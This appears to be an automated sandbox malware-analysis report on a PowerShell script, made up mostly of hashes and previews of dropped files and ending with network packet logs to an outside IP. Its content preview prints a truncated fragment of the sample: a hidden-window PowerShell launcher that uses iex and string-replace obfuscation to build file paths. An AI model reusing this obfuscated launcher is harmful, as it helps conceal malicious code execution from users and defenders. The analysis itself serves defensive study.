                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.361022727805069
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                                                      MD5:70A2D078BEFD5E910EE035832171B399
                                                                                      SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                                                      SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                                                      SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                                                      Malicious:false
                                                                                      Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.373576383011392
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:GRb4TtmLFODZZO8eLLDdJTe3rohP01Jfs7e6gsQZ4IEvdGk1jaOPk5kp8SE79Agy:mkO
                                                                                      MD5:C763B84348381221398005CEAD5AC3AA
                                                                                      SHA1:75A76535E65E4F7615D8C73531344046A52F256B
                                                                                      SHA-256:7C139A21FDE9F8FDB8241152EDA50ADCE8A9C94D047304BE99D245EB0D436D50
                                                                                      SHA-512:98DC64276E47E9937B9487CF697C394518A934562A35782203BA4D1AF38BC50FCE404762A154CCBB67F4D95E7352EE82A450BE30D680B0C5F2DE2B77268D28F9
                                                                                      Malicious:false
                                                                                      Preview:SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:413-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c4818c4b-5399-4e16-9d6a-abc7862d5665.1734608717413 Timestamp=2024-12-19T06:45:17:415-0500 ThreadID=1344 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.416325469650102
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3Zmn:EGvIcNYdYAphxoAm66k3t65
                                                                                      MD5:23C072E4E15260E6768DF89EE44A527A
                                                                                      SHA1:9C03FFAA2A7713890A15C3EB5159857D097BE7A5
                                                                                      SHA-256:F07A71B7400936E5413E9EE47D4576277D6B98EEE32246BDB0F90933FD7BF22C
                                                                                      SHA-512:A4DAA4A874704452BEA639AEFB3AA7F81D1063A53348C175BE7EC2B1FF99AB984F62FD8B89273A54D3F4486E68E7FB07A7834AA0239B2DACBF3504982A50525D
                                                                                      Malicious:false
                                                                                      Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                      Category:dropped
                                                                                      Size (bytes):1407294
                                                                                      Entropy (8bit):7.97605879016224
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                      Category:dropped
                                                                                      Size (bytes):1419751
                                                                                      Entropy (8bit):7.976496077007677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                                                                                      MD5:41034A6B023B6BB9C723DA146E190954
                                                                                      SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                                                                                      SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                                                                                      SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                                                                                      Malicious:false
                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                      Category:dropped
                                                                                      Size (bytes):386528
                                                                                      Entropy (8bit):7.9736851559892425
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                      Malicious:false
                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6220
                                                                                      Entropy (8bit):3.742252193264167
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:yZqx1tWbOUCgQoU2fSKukvhkvklCywFgfM9XlLFSogZoS/M9Xl/FSogZo21:71tfUCgA4QkvhkvCCtsM9XaHDM9X6HF
                                                                                      MD5:E889F1A05BB4D72FF954C549D9D24571
                                                                                      SHA1:3B31D9A1FEFF8B2F16381CD5FB293249A08C9E37
                                                                                      SHA-256:E6EB4597B7A60EB1BB3320DB5415905EBB19530E9B0B9B80627F7AAD84263A92
                                                                                      SHA-512:AAFA54ED6E803CC1CEE068C01F1B1B6BCF062DEB1E7FE4356F450E250701A63C87064ED5BEFA142B1018D7AF55C1A680487F3D0FE97D080A65EB3C58AFC0D6E9
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ....N.5q......n.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....8zj.R..}..o.R......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.]...........................c..A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW)N.Y.]...........................^..R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.]..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.]..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.]....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.]....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.]................
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6220
                                                                                      Entropy (8bit):3.742252193264167
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:yZqx1tWbOUCgQoU2fSKukvhkvklCywFgfM9XlLFSogZoS/M9Xl/FSogZo21:71tfUCgA4QkvhkvCCtsM9XaHDM9X6HF
                                                                                      MD5:E889F1A05BB4D72FF954C549D9D24571
                                                                                      SHA1:3B31D9A1FEFF8B2F16381CD5FB293249A08C9E37
                                                                                      SHA-256:E6EB4597B7A60EB1BB3320DB5415905EBB19530E9B0B9B80627F7AAD84263A92
                                                                                      SHA-512:AAFA54ED6E803CC1CEE068C01F1B1B6BCF062DEB1E7FE4356F450E250701A63C87064ED5BEFA142B1018D7AF55C1A680487F3D0FE97D080A65EB3C58AFC0D6E9
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ....N.5q......n.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....8zj.R..}..o.R......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.]...........................c..A.p.p.D.a.t.a...B.V.1......Y.]..Roaming.@......EW)N.Y.]...........................^..R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.]..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.]..............................W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.]....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.]....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.]................
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                      Category:dropped
                                                                                      Size (bytes):871324
                                                                                      Entropy (8bit):7.827941732382635
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
MD5: CC648C9FBCD03EAC939663F24ED3AB02
SHA1: 56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
SHA-256: F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
SHA-512: 5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
Malicious: false
Preview: %PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

File type: ASCII text, with very long lines (841), with no line terminators
Entropy (8bit): 5.313016331412009
TrID:
File name: 8iAcoQLc3o.ps1
File size: 841 bytes
MD5: 2bd577dc4641703c479a1482dacd6358
SHA1: fc7e7f29396675e92bb998621fa2f6b706b16617
SHA256: 7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935
SHA512: 1d43e269c9515a2f4cb4250a8725195466af196c5e9007406063ac724cc189a8f8bd31cea90d85376f0b7e08340dff008ee4ed91e02e8472d54d0b091e25a42d
SSDEEP: 12:s8ZDFw9EFf4hew9EF3eDEWEjj/xzPvRbLUhQWgTThUlIeRQKz6VuIrKBdzo2K:XJYEMZEljWIDxNLUhQWAa6KzFpzo2K
TLSH: 6C01524966D77AF71100F19630C8553E313A8A0131D504A2B4F0426721ACE3D0EC2D76
File Content Preview: powershell -win hidden $t8ispk=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\hqpoqw.vb')));$flol=iex($('[Environment]::GetEwnas'''.Replace('wna','nvironmentVariable(''public'') + ''\\dmb.vb')));function getit([strin
Icon Hash: 3270d6baae77db44

Network packet table: Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Dec 19, 2024 12:45:13.578236103 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.578299046 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.578310966 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.578341961 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.585129023 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585151911 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585199118 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.585207939 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.585237980 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.592345953 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592371941 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592423916 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.592434883 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.592467070 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.598916054 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.598941088 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.599020004 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.599031925 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.599062920 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743436098 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743468046 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743519068 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743534088 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.743552923 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.743570089 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750298023 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750325918 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750385046 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750394106 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.750413895 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.750427008 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.756725073 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756793976 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756829977 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.756839991 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.756882906 CET49718443192.168.2.10107.161.23.150
                                                                                        Dec 19, 2024 12:45:13.764055014 CET44349718107.161.23.150192.168.2.10
                                                                                        Dec 19, 2024 12:45:13.764106989 CET44349718107.161.23.150192.168.2.10
